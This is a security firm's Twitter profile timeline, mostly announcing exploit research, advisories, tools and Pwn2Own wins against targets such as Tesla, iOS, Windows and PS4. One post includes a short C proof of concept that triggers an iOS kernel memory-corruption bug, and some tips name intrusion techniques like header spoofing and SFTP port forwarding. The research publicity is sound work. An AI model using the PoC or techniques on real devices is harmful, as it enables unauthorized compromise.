Synacktiv

@Synacktiv

17,719 Followers · 274 Following · 370 Media · 1,362 Statuses

Offensive security company. Dojo of many ninjas. Red teaming, reverse engineering, vuln research, dev of security tools and incident response.

France
Joined April 2012
@Synacktiv
Synacktiv
2 years
The PoC is even tweetable ;) void *C(void* a){thread_set_exception_ports(mach_thread_self(),EXC_MASK_ALL,*(int *)a,2,6);__builtin_trap();return a;} int main(){int p=mk_timer_create();mach_port_insert_right(mach_task_self(),p,p,20);pthread_t t;pthread_create(&t,0,C,&p);for(;;);}
@jaakerblom
John Aakerblom
2 years
iOS 15.4 fixes a kernel vulnerability introduced in iOS 15.0 beta that causes corruption of ipc_kmsgs leading to powerful primitives that can be used for local privilege escalation from WebContent and app sandbox
@Synacktiv
Synacktiv
9 months
To facilitate reverse-engineering of large programs, vulnerability research and root-cause analysis on iOS, Android, and other major platforms, @myr463 and @Hexabeast released Frinet, a tool combining Frida with an enhanced version of Tenet.
@Synacktiv
Synacktiv
3 years
Too lazy to write payloads in @Burp_Suite? HopLa adds autocompletion support and a custom payload library! 🤠 cc @alexisdanizan
@Synacktiv
Synacktiv
4 years
This is for the Pwners: exploiting a WebKit 0-day in PlayStation 4! We are happy to announce that @0xdagger and @abu_y0ussef will present their work on breaking the PS4 at #BHEU @BlackHatEvents !
@Synacktiv
Synacktiv
2 years
If you see two guys wearing Synacktiv t-shirts with big antennas, you should turn around with your @Tesla ! 0-click RCE demonstration on a real vehicle, with CAN messages sent to switch on headlights, wipers and trunk 😎 #Pwn2Own
@Synacktiv
Synacktiv
4 years
As no details are available yet, our expert @0xf4b started investigating one of the three iOS vulnerabilities that are exploited in the wild and fixed by version 14.2. You can read the story in our latest blogpost!
@Synacktiv
Synacktiv
4 years
We are in 2021 and SFTP access will never grant you a PTY. But you may still be able to use it to forward data to local ports, remote ports and to Unix domain sockets. A Remote Code Execution is then never far away! #synacktips
@Synacktiv
Synacktiv
2 years
Ninjas are getting ready for #P2OVancouver 💪 #Pwn2Own
@Synacktiv
Synacktiv
2 years
Watch out! CVE-2023-22809 on Sudo was patched today to prevent a privilege escalation on sudoedit. Read the security advisory by @aevy__ and @v1csec:
@Synacktiv
Synacktiv
8 months
Here we are! 🥷 Masters of pwn for the third time 🎉 Congratulations to all the ninjas involved! #Pwn2Own
@Synacktiv
Synacktiv
1 year
After having finished their exploit in a hotel room, @_p0ly_ and @vdehors successfully compromised the Tesla Model 3 infotainment through Bluetooth and elevated their privileges to root! Combined with the previous entry, this could have been a full chain to take over the car!
@thezdi
Zero Day Initiative
1 year
👀👀👀👀👀
@Synacktiv
Synacktiv
4 years
Return of the iOS sandbox escape: lightspeed's back in the race!! The XNU bug @JohnCool__ described last year was reintroduced and is still exploitable in the latest version of iOS, as shown by @unc0verTeam:
@Synacktiv
Synacktiv
8 months
Have you ever wondered what the attack surface of Counter Strike: Global Offensive looks like? Our ninjas @myr463 and @v1csec studied it and found a server to client bug! Read more details about this research in our latest blogpost.
@Synacktiv
Synacktiv
1 year
Sometimes simple is best. See how @SidewayRE exploited a 9-year-old Linux kernel bug at #Pwn2Own Vancouver 2023!
@Synacktiv
Synacktiv
2 years
After many days (and nights!) of hard work, we're really proud to see @_p0ly_ and @vdehors target the @Tesla Model 3 at #Pwn2Own! The draw will take place on Tuesday, send us all your good vibes 💪
@Synacktiv
Synacktiv
1 year
During a recent Active Directory intrusion test, @croco_byte was led to devise a new versatile attack vector targeting Group Policy Objects, allowing their exploitation through NTLM relaying.
@Synacktiv
Synacktiv
4 years
You wanna race the iOS kernel? Here is our take on CVE-2021-1782, where @JohnCool__ explains the LPE vulnerability patched in 14.3:
@Synacktiv
Synacktiv
1 year
Besides LSASS, are you sure you loot every available secret on your compromised Windows host? In our latest blogpost, @l4x4 summarizes the techniques and tools to ensure you do not miss any:
@Synacktiv
Synacktiv
4 years
Despite an active console hacking community, only a few public PS4 exploits have been released. Our experts @abu_y0ussef and @0xdagger gave a talk at #BlackHat Europe on the exploitation of a 0-day browser vulnerability.
@Synacktiv
Synacktiv
4 years
With iOS 13.5.1, Apple killed LightSpeed/ @unc0verTeam ... but Anakin may still crash your iPhone with a racy memleak! More info in our follow up blogpost:
@Synacktiv
Synacktiv
2 years
Ever wanted to exploit a PHP file inclusion without having a file upload? Follow @_remsio_'s journey to discover PHP filter chains, ensure they work properly, and transform them into a tool. You can now convert almost any file inclusion to RCE!
@Synacktiv
Synacktiv
5 months
Explore new ways to easily perform DLL Hijacking for lateral movement using DCOM with our new tool DLHell by @k3vinTell now available on Github!
@Synacktiv
Synacktiv
4 years
We've just presented at @sstic how a 1-day vulnerability in Samsung Trustzone can be used to rewrite the Shannon baseband memory and install a debugger on a Galaxy S7 phone. The PDF 🇬🇧 and talk 🇫🇷 are here: The tools are here:
@Synacktiv
Synacktiv
1 year
After #Pwn2Own Austin in 2021, we are once again Masters of Pwn at #P2OVancouver ! Huge congratulations to the team 🥷, it was amazing!
@thezdi
Zero Day Initiative
1 year
That’s a wrap for #P2OVancouver ! Contestants disclosed 27 unique 0-days and won a combined $1,035,000 (and a car)! Congratulations to the Masters of Pwn, @Synacktiv , for their huge success and hard work! They earned 53 points, $530,000, and a Tesla Model 3. #Pwn2Own
@Synacktiv
Synacktiv
10 months
Unlock the Global Admin access 🏆 on Azure with this pentesting mindmap made by @alexisdanizan !
@Synacktiv
Synacktiv
4 years
We've just presented at @sstic a new exploitation technique using a heap overflow in Windows 10 Kernel Pool. The PDF 🇬🇧 and talk 🇫🇷 are here: The code of the exploit is here:
@Synacktiv
Synacktiv
1 year
Have you ever wanted to extract, decode and decrypt all NTDS.dit data? We are glad to share with you a new tool: ntdissector by @kalimer0x00 and @Julien_Legras , powered by the awesome lib dissect.esedb from @foxit ! More info in the blogpost:
@Synacktiv
Synacktiv
3 years
We did it 😃! What a blast to be part of a team able to claim the title of Master of Pwn! Kudos to all other participants and to @thezdi for the flawless organization. Let’s wait for the patches, then we’ll share the technical details with the community 🤙
@thezdi
Zero Day Initiative
3 years
Here are the final Master of Pwn standings. Congrats to @Synacktiv on claiming the title. It was a close race, but they pulled through.
@Synacktiv
Synacktiv
4 years
A nice addition to our blogpost, #BlackHat has released the slides of @abu_y0ussef and @0xdagger "This is for the pwners - exploiting a webkit 0-day in Playstation 4"
@Synacktiv
Synacktiv
8 months
Our ninja @masthoon solved a tough challenge during @PotluckCTF with an ingenious approach: he built a decompiler for a custom ISA by lifting instructions to Binary Ninja IL. Read the "Pot of Gold" write-up (kudos to @bl4sty for creating the challenge):
@Synacktiv
Synacktiv
4 years
Are you a Red Teamer 3.0 trying to attack Azure Active Directory? Check out the latest blog post from @bak_sec describing its attack paths: Of course, we advise you to read it as well if you're in the Blue Team!
@Synacktiv
Synacktiv
4 years
Have you ever struggled with missing symbols while reversing a .NET native application such as UWP? Have a look at .NIET, our new IDA Pro plugin! cc @HexRaysSA
@Synacktiv
Synacktiv
8 months
Our ninja @_Worty identified a remote code execution from a privileged user in the Cisco Access Point WAP371. This vulnerability, referenced as CVE-2024-20287, will not be patched; apply network restrictions to protect your appliances.
@Synacktiv
Synacktiv
1 year
For the 2nd time, our Ninjas @abu_y0ussef , @netsecurity1 and @cleptho targeted the Canon printer 🖨️ during Pwn2Own Toronto. In this blogpost, you will discover how they achieved code execution, together with a PoC.
@Synacktiv
Synacktiv
5 months
In our latest blogpost, @croco_byte presents an often overlooked AD attack surface related to OU ACLs, with the release of a dedicated exploitation tool, ().
@Synacktiv
Synacktiv
1 year
Excellent start for the team! @_p0ly_ and @vdehors fully compromised the Tesla Model 3 gateway from the Ethernet network 💪 We should book a new parking space now...
@thezdi
Zero Day Initiative
1 year
CONFIRMED! @Synacktiv successfully executed a TOCTOU exploit against Tesla – Gateway. They earn $100,000 as well as 10 Master of Pwn points and this Tesla Model 3. #Pwn2Own #P2OVancouver
@Synacktiv
Synacktiv
5 years
We've released our advisories regarding a bunch of pre-authenticated issues in GLPI: 1) SQLi -> 2) Type juggling -> 3) Timing attack -> 4) Arbitrary call ->
@Synacktiv
Synacktiv
4 years
🥷 #Pwn2Own Tokyo. A DMA attack as the first step of our security research on the Sonos One smart speaker, in order to dump the firmware. Find the detailed blogpost by @_p0ly_ 🤩
@Synacktiv
Synacktiv
2 years
Finding #Java gadget chains has never been so easy with the help of #CodeQL. Check out our latest article, in which @hugow_vincent demonstrates a new technique to leverage the power of CodeQL to find new gadgets: QLinspector:
@Synacktiv
Synacktiv
4 months
We finally got the first place during #HackTheBox #BusinessCTF24 ! Congratulations to all ninjas 🥳
@Synacktiv
Synacktiv
3 years
Are you into Linux exploitation? Read how @vdehors found and exploited a Local Privilege Escalation on Ubuntu Linux during @thezdi #Pwn2Own 2021, using a bug in the shiftFS filesystem driver.
@Synacktiv
Synacktiv
2 years
Our ninjas @yaumn_ and @mickaelweb recently assessed Microsoft Defender for Identity detection capabilities. In their recent blogpost, they describe the product's architecture, present some bypasses and give general Red Team advice.
@Synacktiv
Synacktiv
2 years
Always wanted to proxy traffic through a Citrix connection? Following @hugoclout's presentation at @sstic, we just released Ica2Tcp!
@Synacktiv
Synacktiv
4 years
The slides of the talk "Speedpwning VMware Workstation" by @BrunoPujos and @OnlyTheDuck are available! Check them out if you missed their talk at @ekoparty 2020!
@Synacktiv
Synacktiv
4 years
We've spotted an interesting feature in the Samsung DSP driver on Galaxy S20/S21: untrusted Android apps can load custom firmware on the chip... See how this feature can lead to arbitrary kernel write on our latest blogpost:
@Synacktiv
Synacktiv
5 months
Interested in finding and exploiting vulnerabilities in old video games? If so, you'll love our latest blogpost on American Conquest by @tomtombinary !
@Synacktiv
Synacktiv
4 years
#Pwn2Own Tokyo 2020. This blogpost explains the details of our CVE-2021-27246, a remote code execution on TP-Link AC1750 Smart Wifi Router. Exploit, wait, and get root!
@Synacktiv
Synacktiv
6 years
Slides for @elvanderb presentation "macOS: how to gain root with CVE-2018-4193 in < 10s" @offensive_con are available!
@Synacktiv
Synacktiv
10 days
We just rewrote the AsOutsider part of #AADInternals in Python to enhance compatibility and ease of use in Linux environments. You can find it here:
@Synacktiv
Synacktiv
3 years
During a security assessment, our team found an insecure deserialisation of PHAR archives in the Html2Pdf library <= 5.2.3. It could allow remote attackers able to input arbitrary HTML content to gain remote code execution on the server.
@Synacktiv
Synacktiv
3 years
Take over an entire domain by resetting passwords! We detailed how to exploit CVE-2021-40539 on ManageEngine ADSelfService Plus in this blogpost @acervoise - @tiyeuse
@Synacktiv
Synacktiv
2 months
In their latest blogpost, @hugow_vincent and @loadlow developed in-memory post-exploitation payloads to inject and hook common Java applications. Come and see the Java shenanigans involved to interact with the apps from the inside!
@Synacktiv
Synacktiv
1 year
Ever wanted to understand PHP concepts in depth? This series of 2 articles by @_remsio_ details a POP chain targeting the doctrine/doctrine-bundle package. In this first one, we aim to show a full methodology of POP chain research. Stay tuned for part 2!
@Synacktiv
Synacktiv
3 years
Master of Pwn received! Thank you @thezdi 😄
@Synacktiv
Synacktiv
6 years
New technical write-up by @Fist0urs on how to perform a DMA attack against a Windows 10 workstation (TPM-only BitLocker)
@Synacktiv
Synacktiv
8 months
Things are going pretty well so far 🚗 #Pwn2Own
@Synacktiv
Synacktiv
1 year
In no time, the mighty @elvanderb pwned his favorite target: XNU, the Apple macOS kernel! Rumor has it that he took more time developing the ASCII art than the actual exploit 🥷 #P2OVancouver
@thezdi
Zero Day Initiative
1 year
Success! @Synacktiv used a TOCTOU bug to escalate privileges on Apple macOS. They earn $40,000 and 4 Master of Pwn points. #Pwn2Own #P2OVancouver
@Synacktiv
Synacktiv
1 year
Due to the incredible bug chain used for this entry, ZDI decided it qualified for the first ever Tier2 in #Pwn2Own ! Huge congratz @_p0ly_ and @vdehors 💪 #P2OVancouver
@thezdi
Zero Day Initiative
1 year
CONFIRMED! @Synacktiv used a heap overflow & an OOB write to exploit the Infotainment system on the Tesla. When they gave us the details, we determined they actually qualified for a Tier 2 award! They win $250,000 and 25 Master of Pwn points. 1st ever Tier 2 award. Stellar work!
@Synacktiv
Synacktiv
1 year
Did you enjoy the latest blogpost on PHP filter chains? Well, our ninja @_remsio_ strikes again with a new article detailing how you can abuse them to leak files from the targeted system, as well as a freshly developed tool to exploit it!
@Synacktiv
Synacktiv
2 years
If you enjoy sailing the sea, beware! @MajorTomSec has found a critical security vulnerability in @RaftSurvivaGame , allowing 0-click RCE on any online player. The vendor has remained silent for 5 months, so here are the details:
@Synacktiv
Synacktiv
4 years
Are you getting bored at home? Our last Windows 10 use-after-free kernel exploitation challenge is publicly available on @rootme_org :
@Synacktiv
Synacktiv
7 years
Partial eclipse of Juniper today! Decrypt ScreenOS passwords and keys 😎
@Synacktiv
Synacktiv
6 months
Ever faced a WAF/EDR while exploiting a Java deserialization? Check out our latest blogpost by @loadlow for stealthier exploitation, exfiltration and persistence by diving deep into translets, transformers and more!
@Synacktiv
Synacktiv
6 years
iOS12 Kernelcache laundering: adding PAC instructions and kernelcache relocations support to IDA via IDAPython
@Synacktiv
Synacktiv
25 days
In our latest blogpost, @croco_byte explores the inner workings of SCCM policies and introduces , a tool targeting secret policies in order to exploit misconfigurations, harvest credentials, and pivot across collections by impersonating legitimate clients.
@Synacktiv
Synacktiv
2 years
Cool vulnerabilities don't last long! Netgear killed two of our entries with a last minute patch before #Pwn2Own !
@Synacktiv
Synacktiv
6 years
From sandbox to kernel: iOS/macOS 0-day^w48-hours by @elvanderb at @BeeRumP_Paris #RageDisclosurePolicy
@Synacktiv
Synacktiv
4 years
First action when testing Symfony applications is to search app_dev.php. This dev feature is so powerful that we've released to exploit it. It's often restricted to localhost, but HTTP_CLIENT_IP, X-FORWARDED-FOR or a nice SSRF may help 😃
@Synacktiv
Synacktiv
4 years
Have you ever tried to exploit CVE-2020-16952 (SSI on SharePoint by @steventseeley ) and failed with “Unknown server tag 'WebPartPages:DataFormWebPart'”? Well, just register the tag before using it! #synacktivtips
@Synacktiv
Synacktiv
4 months
In his latest blogpost, @yaumn_ analyzes MDI's detection of PKINIT authentication, explains how to bypass it and releases Invoke-RunAsWithCert, a tool to perform Kerberos authentication via PKINIT with the Windows API from a non domain-joined machine.
@Synacktiv
Synacktiv
4 months
Want to know how deleted photos reappeared in iOS 17.5? Check out today's blogpost by @Lefnui 🍎
@Synacktiv
Synacktiv
5 years
"Hey la Kibana, Inspection des gadgets !" 😋 Pwning Kibana 6.2 using prototype pollution and CVE-2018-17246 by @_mabote_
@Synacktiv
Synacktiv
4 years
Always scan for open proxies with nmap http-open-proxy script, to hit internal services and make your friend’s blind SSRF look really superfluous… #synacktips
@Synacktiv
Synacktiv
4 years
Our team targeted VMware Workstation with a guest-to-host escape during #Pwn2Own. While we couldn't demonstrate the exploit in the allotted time, @thezdi found the vulnerability to be valid and purchased it 👏 Details in 120 days when fixed by @VMware!
@Synacktiv
Synacktiv
4 months
Sometimes, the obstinacy of our Linux fans leads to interesting findings on iOS USB networking. Have a look at our latest blogpost by @flogallium
@Synacktiv
Synacktiv
2 years
FreeBSD just published a security advisory about a vulnerability we discovered in bhyve. @abu_y0ussef will present in an upcoming conference how he turned it into a VM escape!
@Synacktiv
Synacktiv
4 years
Have you ever wondered how the IDA Lumina feature works, what kind of data is sent, and wished for a local server under your control? @_johan_b_ wrote a blog post to answer these questions: An offline server is also available:
@Synacktiv
Synacktiv
6 years
Patch your Packet Filter: OpenBSD & FreeBSD remote DoS in 2 IPv6 packets. Please don't fragment the Internet! #CVE-2019-5597
@Synacktiv
Synacktiv
8 months
Only a few days until #Pwn2Own Automotive in Tokyo. Our ninjas will bring some interesting entries with them ;)
@Synacktiv
Synacktiv
7 years
RCE vulnerability in HP iLO, it's time to patch before the release of additional details:
@Synacktiv
Synacktiv
3 years
Exploit and firmware decryption script for Samsung Q60T TV presented at @GrehackConf by @Karion_ and @tlk___ has been pushed on Github! Check this out:
@Synacktiv
Synacktiv
3 years
W^X, ASLR, seccomp, CFI, PAC, *Guard... binary exploitation is getting harder and harder... But most consumer-grade devices are stuck in the 90's when it comes to embedded security, so let's have fun with a #pwn2own target:
@Synacktiv
Synacktiv
10 months
Unable to extract your firmware to find vulnerabilities? Voltage glitching might be the solution. Dive in with @___t0___ to see how it could be useful!
@Synacktiv
Synacktiv
3 years
Looks like we’ll bring back the trophy to France 🇫🇷 this year! 😁🙏🍀
@Synacktiv
Synacktiv
3 years
First part of a summer series on writing your own symbolic execution engine, from scratch, complete with SMT solving, and, for a change, not in Python :) By the legendary @bartavelle
@Synacktiv
Synacktiv
4 years
Obviously, cryptography can't protect you from everything, such as arbitrary code execution... especially when you leak the private key. This is the story of a Typo3 CMS RCE by @hugow_vincent
@Synacktiv
Synacktiv
1 year
Rare are the pentesters who have never come across an up-to-date CMS installation during a 3-day audit, wondering what to do next. We are starting a blogpost series covering CMS and web framework internals, with two articles by @_bluesheet
@Synacktiv
Synacktiv
6 years
Kick-start your code obfuscation techniques
@Synacktiv
Synacktiv
1 year
Have you ever come across a device implementing U-Boot? Didn't know where to start? In our latest blogpost, @___t0___ explains why you should definitely dive into it:
@Synacktiv
Synacktiv
8 months
During a security assessment, our ninja @l4x4 identified multiple vulnerabilities in Cisco UCM allowing an attacker to gain code execution, escalate privileges to root and then escape the SELinux context. Patch asap and read the details here:
@Synacktiv
Synacktiv
2 years
Let the bees out! Escaping from the bhyve hypervisor by @abu_y0ussef 🐝
@Synacktiv
Synacktiv
4 months
Last week, Microsoft released a patch for CVE-2024-26238, a Windows 10 LPE reported by @yaumn_ . You can read the advisory here:
@Synacktiv
Synacktiv
11 months
During an audit, @us3r777 and @_remsio_ found a vulnerability in Geoserver WMS. They leveraged an SSRF and a CRLF injection to target a Redis server and obtain RCE!